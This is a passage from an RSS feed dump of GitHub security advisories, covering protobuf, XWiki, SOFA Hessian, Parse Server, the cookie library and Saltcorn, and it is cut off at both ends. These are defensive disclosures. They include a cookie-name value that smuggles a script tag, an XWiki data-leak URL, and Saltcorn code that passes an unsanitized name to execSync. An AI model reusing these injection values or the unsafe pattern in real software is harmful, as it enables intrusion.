<p>For reproduction details, please refer to the unit tests (Protobuf Java <a href="https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/lite/src/test/java/com/google/protobuf/LiteTest.java">LiteTest</a> and <a href="https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/core/src/test/java/com/google/protobuf/CodedInputStreamTest.java">CodedInputStreamTest</a>) that identify the specific inputs that exercise this parsing weakness.</p>
<h3>Remediation and Mitigation</h3>
<p>We have been working diligently to address this issue and have released a mitigation that is available now. Please update to the latest available versions of the following packages:</p>
<ul>
<li>protobuf-java (3.25.5, 4.27.5, 4.28.2)</li>
<li>protobuf-javalite (3.25.5, 4.27.5, 4.28.2)</li>
<li>protobuf-kotlin (3.25.5, 4.27.5, 4.28.2)</li>
<li>protobuf-kotlin-lite (3.25.5, 4.27.5, 4.28.2)</li>
<li>com-protobuf [JRuby gem only] (3.25.5, 4.27.5, 4.28.2)</li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-735f-pc8j-v9w8" href="https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-735f-pc8j-v9w8">GHSA-735f-pc8j-v9w8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-7254" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-7254</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/protocolbuffers/protobuf/commit/4728531c162f2f9e8c2ca1add713cfee2db6be3b/hovercard" href="https://github.com/protocolbuffers/protobuf/commit/4728531c162f2f9e8c2ca1add713cfee2db6be3b">protocolbuffers/protobuf@<tt>4728531</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/protocolbuffers/protobuf/commit/850fcce9176e2c9070614dab53537760498c926b/hovercard" href="https://github.com/protocolbuffers/protobuf/commit/850fcce9176e2c9070614dab53537760498c926b">protocolbuffers/protobuf@<tt>850fcce</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/protocolbuffers/protobuf/commit/9a5f5fe752a20cbac2e722b06949ac985abdd534/hovercard" href="https://github.com/protocolbuffers/protobuf/commit/9a5f5fe752a20cbac2e722b06949ac985abdd534">protocolbuffers/protobuf@<tt>9a5f5fe</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/protocolbuffers/protobuf/commit/ac9fb5b4c71b0dd80985b27684e265d1f03abf46/hovercard" href="https://github.com/protocolbuffers/protobuf/commit/ac9fb5b4c71b0dd80985b27684e265d1f03abf46">protocolbuffers/protobuf@<tt>ac9fb5b</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/protocolbuffers/protobuf/commit/cc8b3483a5584b3301e3d43d17eb59704857ffaa/hovercard" href="https://github.com/protocolbuffers/protobuf/commit/cc8b3483a5584b3301e3d43d17eb59704857ffaa">protocolbuffers/protobuf@<tt>cc8b348</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/protocolbuffers/protobuf/commit/d6c82fc55a76481c676f541a255571e8950bb8c3/hovercard" href="https://github.com/protocolbuffers/protobuf/commit/d6c82fc55a76481c676f541a255571e8950bb8c3">protocolbuffers/protobuf@<tt>d6c82fc</tt></a></li>
<li><a href="https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2024-7254.yml">https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2024-7254.yml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-735f-pc8j-v9w8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-735f-pc8j-v9w8</guid>
<pubDate>Thu, 19 Sep 2024 16:06:03 GMT</pubDate>
</item>
<item>
<title>Gematik Referenzvalidator has an XXE vulnerability that can lead to a Server Side Request Forgery attack</title>
<description><h3>Impact</h3>
<p>The profile location routine in the referencevalidator commons package is vulnerable to <a href="https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)" rel="nofollow">XML External Entities</a> attack due to insecure defaults of the used Woodstox WstxInputFactory. A malicious XML resource can lead to network requests issued by referencevalidator and thus to a <a href="https://owasp.org/www-community/attacks/Server_Side_Request_Forgery" rel="nofollow">Server Side Request Forgery</a> attack.</p>
<p>The vulnerability impacts applications which use referencevalidator to process XML resources from untrusted sources.</p>
<h3>Patches</h3>
<p>The problem has been patched with the <a href="https://github.com/gematik/app-referencevalidator/releases/tag/2.5.1">2.5.1 version</a> of the referencevalidator. Users are strongly recommended to update to this version or a more recent one.</p>
<h3>Workarounds</h3>
<p>A pre-processing or manual analysis of input XML resources on existence of DTD definitions or external entities can mitigate the problem.</p>
<h3>References</h3>
<ul>
<li><a href="https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)#" rel="nofollow">OWASP Top 10 XXE</a></li>
<li><a href="https://owasp.org/www-community/attacks/Server_Side_Request_Forgery" rel="nofollow">Server Side Request Forgery</a></li>
<li><a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory" rel="nofollow">OWASP XML External Entity Prevention Cheat Sheet</a></li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-68j8-fp38-p48q" href="https://github.com/gematik/app-referencevalidator/security/advisories/GHSA-68j8-fp38-p48q">GHSA-68j8-fp38-p48q</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/gematik/app-referencevalidator/commit/d6d27613fab7a8dd08534946f29e0c51f319cad6/hovercard" href="https://github.com/gematik/app-referencevalidator/commit/d6d27613fab7a8dd08534946f29e0c51f319cad6">gematik/app-referencevalidator@<tt>d6d2761</tt></a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-46984" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-46984</a></li>
<li><a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory" rel="nofollow">https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory</a></li>
<li><a href="https://github.com/gematik/app-referencevalidator/releases/tag/2.5.1">https://github.com/gematik/app-referencevalidator/releases/tag/2.5.1</a></li>
<li><a href="https://owasp.org/www-community/attacks/Server_Side_Request_Forgery" rel="nofollow">https://owasp.org/www-community/attacks/Server_Side_Request_Forgery</a></li>
<li><a href="https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)" rel="nofollow">https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)</a></li>
<li><a href="https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)#" rel="nofollow">https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE)#</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-68j8-fp38-p48q</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-68j8-fp38-p48q</guid>
<pubDate>Thu, 19 Sep 2024 14:49:40 GMT</pubDate>
</item>
<item>
<title>SOFA Hessian Remote Command Execution (RCE) Vulnerability</title>
<description><h3>Impact</h3>
<p>SOFA Hessian protocol uses a blacklist mechanism to restrict deserialization of potentially dangerous classes for security protection. But there is a gadget chain that can bypass the SOFA Hessian blacklist protection mechanism, and this gadget chain only relies on JDK and does not rely on any third-party components.</p>
<h3>Patches</h3>
<p>Fixed this issue by update blacklist, users can upgrade to sofahessian version 3.5.5 to avoid this issue.</p>
<h3>Workarounds</h3>
<p>You can maintain a blacklist yourself in this directory <code class="notranslate">external/serialize.blacklist</code>.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-c459-2m73-67hj" href="https://github.com/sofastack/sofa-hessian/security/advisories/GHSA-c459-2m73-67hj">GHSA-c459-2m73-67hj</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/sofastack/sofa-hessian/commit/764ef4b216aee6aeb4b111aec8947a4e8b53bb87/hovercard" href="https://github.com/sofastack/sofa-hessian/commit/764ef4b216aee6aeb4b111aec8947a4e8b53bb87">sofastack/sofa-hessian@<tt>764ef4b</tt></a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-46983" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-46983</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-c459-2m73-67hj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-c459-2m73-67hj</guid>
<pubDate>Thu, 19 Sep 2024 14:49:20 GMT</pubDate>
</item>
<item>
<title>org.xwiki.platform:xwiki-platform-notifications-ui leaks data of notification filters of users</title>
<description><h3>Impact</h3>
<p>It's possible to get access to notification filters of any user by using a URL such as <code class="notranslate">&lt;hostname&gt;xwiki/bin/get/XWiki/Notifications/Code/NotificationFilterPreferenceLivetableResults?outputSyntax=plain&amp;type=custom&amp;user=&lt;username&gt;</code>. This vulnerability impacts all versions of XWiki since 13.2-rc-1.<br>
The filters do not provide much information (they mainly contain references which are public data in XWiki), though some info could be used in combination with other vulnerabilities.</p>
<h3>Patches</h3>
<p>The vulnerability has been patched in XWiki 14.10.21, 15.5.5, 15.10.1, 16.0RC1.<br>
The patch consists in checking the rights of the user when sending the data.</p>
<h3>Workarounds</h3>
<p>It's possible to workaround the vulnerability by applying manually the patch: it's possible for an administrator to edit directly the document <code class="notranslate">XWiki.Notifications.Code.NotificationFilterPreferenceLivetableResults</code> to apply the same changes as in the patch. See c8c6545f9bde6f5aade994aa5b5903a67b5c2582.</p>
<h3>References</h3>
<ul>
<li>Jira ticket: <a href="https://jira.xwiki.org/browse/XWIKI-20336" rel="nofollow">https://jira.xwiki.org/browse/XWIKI-20336</a></li>
<li>Commit: c8c6545f9bde6f5aade994aa5b5903a67b5c2582</li>
</ul>
<h3>For more information</h3>
<p>If you have any questions or comments about this advisory:</p>
<ul>
<li>Open an issue in <a href="https://jira.xwiki.org/" rel="nofollow">Jira XWiki.org</a></li>
<li>Email us at <a href="mailto:security@xwiki.org">Security Mailing List</a></li>
</ul>
<h3>Attribution</h3>
<p>This vulnerability has been reported on Intigriti by <a href="https://www.linkedin.com/in/metehan-kalkan-5a3201199" rel="nofollow">Mete</a>.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-pg4m-3gp6-hw4w" href="https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pg4m-3gp6-hw4w">GHSA-pg4m-3gp6-hw4w</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/29e5edbb2b7068ada17290cea41e0aa8144e1294/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/29e5edbb2b7068ada17290cea41e0aa8144e1294">xwiki/xwiki-platform@<tt>29e5edb</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/a0352922a1a61e0e858a9be89d73f0665630a63a/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/a0352922a1a61e0e858a9be89d73f0665630a63a">xwiki/xwiki-platform@<tt>a035292</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/c8c6545f9bde6f5aade994aa5b5903a67b5c2582/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/c8c6545f9bde6f5aade994aa5b5903a67b5c2582">xwiki/xwiki-platform@<tt>c8c6545</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/ed090d1aa228848d3860968c437b72db3b09119f/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/ed090d1aa228848d3860968c437b72db3b09119f">xwiki/xwiki-platform@<tt>ed090d1</tt></a></li>
<li><a href="https://jira.xwiki.org/browse/XWIKI-20336" rel="nofollow">https://jira.xwiki.org/browse/XWIKI-20336</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-46979" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-46979</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pg4m-3gp6-hw4w</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pg4m-3gp6-hw4w</guid>
<pubDate>Wed, 18 Sep 2024 14:26:20 GMT</pubDate>
</item>
<item>
<title>org.xwiki.platform:xwiki-platform-notifications-ui is missing checks for notification filter preferences editions</title>
<description><h3>Impact</h3>
<p>It's possible for any user knowing the ID of a notification filter preference of another user, to enable/disable it or even delete it. The impact is that the target user might start loosing notifications on some pages because of this.<br>
This vulnerability is present in XWiki since 13.2-rc-1.</p>
<h3>Patches</h3>
<p>The vulnerability has been patched in XWiki 14.10.21, 15.5.5, 15.10.1, 16.0-rc-1. The patch consists in checking properly the rights of the user before performing any action on the filters.</p>
<h3>Workarounds</h3>
<p>It's possible to fix manually the vulnerability by editing the document <code class="notranslate">XWiki.Notifications.Code.NotificationPreferenceService</code> to apply the changes performed in this commit e8acc9d8e6af7dfbfe70716ded431642ae4a6dd4.</p>
<h3>References</h3>
<ul>
<li>JIRA ticket: <a href="https://jira.xwiki.org/browse/XWIKI-20337" rel="nofollow">https://jira.xwiki.org/browse/XWIKI-20337</a></li>
<li>Commit: e8acc9d8e6af7dfbfe70716ded431642ae4a6dd4</li>
</ul>
<h3>For more information</h3>
<p>If you have any questions or comments about this advisory:</p>
<ul>
<li>Open an issue in <a href="https://jira.xwiki.org/" rel="nofollow">Jira XWiki.org</a></li>
<li>Email us at <a href="mailto:security@xwiki.org">Security Mailing List</a></li>
</ul>
<h3>Attribution</h3>
<p>This vulnerability has been reported on Intigriti by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/floerer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/floerer">@floerer</a></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-r95w-889q-x2gx" href="https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-r95w-889q-x2gx">GHSA-r95w-889q-x2gx</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/4771573dac88e0cf04e30f1a8dfa183c048d503a/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/4771573dac88e0cf04e30f1a8dfa183c048d503a">xwiki/xwiki-platform@<tt>4771573</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/99193a7e9a203b5bb8b2583ac96f5f4d56b9aa1a/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/99193a7e9a203b5bb8b2583ac96f5f4d56b9aa1a">xwiki/xwiki-platform@<tt>99193a7</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/b9180b874a22e383ad5f2cd9e25bfed4594d4955/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/b9180b874a22e383ad5f2cd9e25bfed4594d4955">xwiki/xwiki-platform@<tt>b9180b8</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/xwiki/xwiki-platform/commit/e8acc9d8e6af7dfbfe70716ded431642ae4a6dd4/hovercard" href="https://github.com/xwiki/xwiki-platform/commit/e8acc9d8e6af7dfbfe70716ded431642ae4a6dd4">xwiki/xwiki-platform@<tt>e8acc9d</tt></a></li>
<li><a href="https://jira.xwiki.org/browse/XWIKI-20337" rel="nofollow">https://jira.xwiki.org/browse/XWIKI-20337</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-46978" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-46978</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-r95w-889q-x2gx</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-r95w-889q-x2gx</guid>
<pubDate>Wed, 18 Sep 2024 14:26:16 GMT</pubDate>
</item>
<item>
<title>Keycloak Services has a potential bypass of brute force protection</title>
... |
http://localhost:1200/github/advisor/data/reviewed/npm - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - npm - reviewed</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github/advisor/data/reviewed/npm" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - npm - reviewed - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Sat, 05 Oct 2024 18:31:10 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>cookie accepts cookie name, path, and domain with out of bounds characters</title>
<description><h3>Impact</h3>
<p>The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, <code class="notranslate">serialize("userName=&lt;script&gt;alert('XSS3')&lt;/script&gt;; Max-Age=2592000; a", value)</code> would result in <code class="notranslate">"userName=&lt;script&gt;alert('XSS3')&lt;/script&gt;; Max-Age=2592000; a=test"</code>, setting <code class="notranslate">userName</code> cookie to <code class="notranslate">&lt;script&gt;</code> and ignoring <code class="notranslate">value</code>.</p>
<p>A similar escape can be used for <code class="notranslate">path</code> and <code class="notranslate">domain</code>, which could be abused to alter other fields of the cookie.</p>
<h3>Patches</h3>
<p>Upgrade to 0.7.0, which updates the validation for <code class="notranslate">name</code>, <code class="notranslate">path</code>, and <code class="notranslate">domain</code>.</p>
<h3>Workarounds</h3>
<p>Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.</p>
<h3>References</h3>
<ul>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2414371453" data-permission-text="Title is private" data-url="https://github.com/jshttp/cookie/issues/167" data-hovercard-type="pull_request" data-hovercard-url="/jshttp/cookie/pull/167/hovercard" href="https://github.com/jshttp/cookie/pull/167">jshttp/cookie#167</a></li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-pxg6-pf52-xh8x" href="https://github.com/jshttp/cookie/security/advisories/GHSA-pxg6-pf52-xh8x">GHSA-pxg6-pf52-xh8x</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2414371453" data-permission-text="Title is private" data-url="https://github.com/jshttp/cookie/issues/167" data-hovercard-type="pull_request" data-hovercard-url="/jshttp/cookie/pull/167/hovercard" href="https://github.com/jshttp/cookie/pull/167">jshttp/cookie#167</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c/hovercard" href="https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c">jshttp/cookie@<tt>e100428</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pxg6-pf52-xh8x</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pxg6-pf52-xh8x</guid>
<pubDate>Fri, 04 Oct 2024 20:31:00 GMT</pubDate>
</item>
<item>
<title>Parse Server's custom object ID allows to acquire role privileges</title>
<description><h3>Impact</h3>
<p>If the Parse Server option <code class="notranslate">allowCustomObjectId: true</code> is set, an attacker that is allowed to create a new user can set a custom object ID for that new user that exploits the vulnerability and acquires privileges of a specific role.</p>
<h3>Patches</h3>
<p>Improved validation for custom user object IDs. Session tokens for existing users with an object ID that exploits the vulnerability are now rejected.</p>
<h3>Workarounds</h3>
<ul>
<li>Disable custom object IDs by setting <code class="notranslate">allowCustomObjectId: false</code> or not setting the option which defaults to <code class="notranslate">false</code>.</li>
<li>Use a Cloud Code Trigger to validate that a new user's object ID doesn't start with the prefix <code class="notranslate">role:</code>.</li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-8xq9-g7ch-35hg" href="https://github.com/parse-community/parse-server/security/advisories/GHSA-8xq9-g7ch-35hg">GHSA-8xq9-g7ch-35hg</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2564579124" data-permission-text="Title is private" data-url="https://github.com/parse-community/parse-server/issues/9317" data-hovercard-type="pull_request" data-hovercard-url="/parse-community/parse-server/pull/9317/hovercard" href="https://github.com/parse-community/parse-server/pull/9317">parse-community/parse-server#9317</a> (fix for Parse Server 7)</li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2564597127" data-permission-text="Title is private" data-url="https://github.com/parse-community/parse-server/issues/9318" data-hovercard-type="pull_request" data-hovercard-url="/parse-community/parse-server/pull/9318/hovercard" href="https://github.com/parse-community/parse-server/pull/9318">parse-community/parse-server#9318</a> (fix for Parse Server 6)</li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-8xq9-g7ch-35hg" href="https://github.com/parse-community/parse-server/security/advisories/GHSA-8xq9-g7ch-35hg">GHSA-8xq9-g7ch-35hg</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47183" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47183</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2564579124" data-permission-text="Title is private" data-url="https://github.com/parse-community/parse-server/issues/9317" data-hovercard-type="pull_request" data-hovercard-url="/parse-community/parse-server/pull/9317/hovercard" href="https://github.com/parse-community/parse-server/pull/9317">parse-community/parse-server#9317</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2564597127" data-permission-text="Title is private" data-url="https://github.com/parse-community/parse-server/issues/9318" data-hovercard-type="pull_request" data-hovercard-url="/parse-community/parse-server/pull/9318/hovercard" href="https://github.com/parse-community/parse-server/pull/9318">parse-community/parse-server#9318</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/parse-community/parse-server/commit/13ee52f0d19ef3a3524b3d79aea100e587eb3cfc/hovercard" href="https://github.com/parse-community/parse-server/commit/13ee52f0d19ef3a3524b3d79aea100e587eb3cfc">parse-community/parse-server@<tt>13ee52f</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/parse-community/parse-server/commit/1bfbccf9ee7ea77533b2b2aa7c4c69f3bd35e66f/hovercard" href="https://github.com/parse-community/parse-server/commit/1bfbccf9ee7ea77533b2b2aa7c4c69f3bd35e66f">parse-community/parse-server@<tt>1bfbccf</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8xq9-g7ch-35hg</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8xq9-g7ch-35hg</guid>
<pubDate>Fri, 04 Oct 2024 18:50:56 GMT</pubDate>
</item>
<item>
<title>@saltcorn/plugins-loader unsanitized plugin name leads to a remote code execution (RCE) vulnerability when creating plugins using git source</title>
<description><h3>Summary</h3>
<p>When creating a new plugin using the <code class="notranslate">git</code> source, the user-controlled value <code class="notranslate">req.body.name</code> is used to build the plugin directory where the location will be cloned. The API used to execute the <code class="notranslate">git clone</code> command with the user-controlled data is <code class="notranslate">child_process.execSync</code>. Since the user-controlled data is not validated, a user with admin permission can add escaping characters and execute arbitrary commands, leading to a command injection vulnerability.</p>
<h3>Details</h3>
<p>Relevant code from source (<code class="notranslate">req.body</code>) to sink (<code class="notranslate">child_process.execSync</code>).</p>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/plugins.js#L1400">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/plugins.js#L1400</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate"><span class="pl-s1">router</span><span class="pl-kos">.</span><span class="pl-en">post</span><span class="pl-kos">(</span>
<span class="pl-s">"/"</span><span class="pl-kos">,</span>
<span class="pl-s1">isAdmin</span><span class="pl-kos">,</span>
<span class="pl-en">error_catcher</span><span class="pl-kos">(</span><span class="pl-k">async</span> <span class="pl-kos">(</span><span class="pl-s1">req</span><span class="pl-kos">,</span> <span class="pl-s1">res</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-kos">{</span>
<span class="pl-k">const</span> <span class="pl-s1">plugin</span> <span class="pl-c1">=</span> <span class="pl-k">new</span> <span class="pl-v">Plugin</span><span class="pl-kos">(</span><span class="pl-s1">req</span><span class="pl-kos">.</span><span class="pl-c1">body</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-c">// [1] </span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-k">try</span> <span class="pl-kos">{</span>
<span class="pl-k">await</span> <span class="pl-s1">load_plugins</span><span class="pl-kos">.</span><span class="pl-en">loadAndSaveNewPlugin</span><span class="pl-kos">(</span> <span class="pl-c">// [3] </span>
<span class="pl-s1">plugin</span><span class="pl-kos">,</span>
<span class="pl-s1">schema</span> <span class="pl-c1">===</span> <span class="pl-s1">db</span><span class="pl-kos">.</span><span class="pl-c1">connectObj</span><span class="pl-kos">.</span><span class="pl-c1">default_schema</span> <span class="pl-c1">||</span> <span class="pl-s1">plugin</span><span class="pl-kos">.</span><span class="pl-c1">source</span> <span class="pl-c1">===</span> <span class="pl-s">"github"</span>
<span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-kos">}</span>
<span class="pl-kos">}</span><span class="pl-kos">)</span>
<span class="pl-kos">)</span><span class="pl-kos">;</span></pre></div>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/saltcorn-data/models/plugin.ts#L44">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/saltcorn-data/models/plugin.ts#L44</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate"><span class="pl-k">class</span> <span class="pl-v">Plugin</span> <span class="pl-kos">{</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-en">constructor</span><span class="pl-kos">(</span><span class="pl-s1">o</span>: <span class="pl-v">PluginCfg</span> <span class="pl-c1">|</span> <span class="pl-v">PluginPack</span> <span class="pl-c1">|</span> <span class="pl-v">Plugin</span><span class="pl-kos">)</span> <span class="pl-kos">{</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">name</span> <span class="pl-c1">=</span> <span class="pl-s1">o</span><span class="pl-kos">.</span><span class="pl-c1">name</span><span class="pl-kos">;</span> <span class="pl-c">// [2] </span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-kos">}</span></pre></div>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/load_plugins.js#L64-L65">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/load_plugins.js#L64-L65</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate"><span class="pl-k">const</span> <span class="pl-en">loadAndSaveNewPlugin</span> <span class="pl-c1">=</span> <span class="pl-k">async</span> <span class="pl-kos">(</span><span class="pl-s1">plugin</span><span class="pl-kos">,</span> <span class="pl-s1">force</span><span class="pl-kos">,</span> <span class="pl-s1">noSignalOrDB</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-kos">{</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-k">const</span> <span class="pl-s1">loader</span> <span class="pl-c1">=</span> <span class="pl-k">new</span> <span class="pl-v">PluginInstaller</span><span class="pl-kos">(</span><span class="pl-s1">plugin</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-c">// [4] </span>
<span class="pl-k">const</span> <span class="pl-s1">res</span> <span class="pl-c1">=</span> <span class="pl-k">await</span> <span class="pl-s1">loader</span><span class="pl-kos">.</span><span class="pl-en">install</span><span class="pl-kos">(</span><span class="pl-s1">force</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-c">// [7] </span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-kos">}</span><span class="pl-kos">;</span></pre></div>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L41-L61">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L41-L61</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate"><span class="pl-k">class</span> <span class="pl-v">PluginInstaller</span> <span class="pl-kos">{</span>
<span class="pl-en">constructor</span><span class="pl-kos">(</span><span class="pl-s1">plugin</span><span class="pl-kos">,</span> <span class="pl-s1">opts</span> <span class="pl-c1">=</span> <span class="pl-kos">{</span><span class="pl-kos">}</span><span class="pl-kos">)</span> <span class="pl-kos">{</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-k">const</span> <span class="pl-s1">tokens</span> <span class="pl-c1">=</span>
<span class="pl-s1">plugin</span><span class="pl-kos">.</span><span class="pl-c1">source</span> <span class="pl-c1">===</span> <span class="pl-s">"npm"</span>
? <span class="pl-s1">plugin</span><span class="pl-kos">.</span><span class="pl-c1">location</span><span class="pl-kos">.</span><span class="pl-en">split</span><span class="pl-kos">(</span><span class="pl-s">"/"</span><span class="pl-kos">)</span>
: <span class="pl-s1">plugin</span><span class="pl-kos">.</span><span class="pl-c1">name</span><span class="pl-kos">.</span><span class="pl-en">split</span><span class="pl-kos">(</span><span class="pl-s">"/"</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-c">// [5] </span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
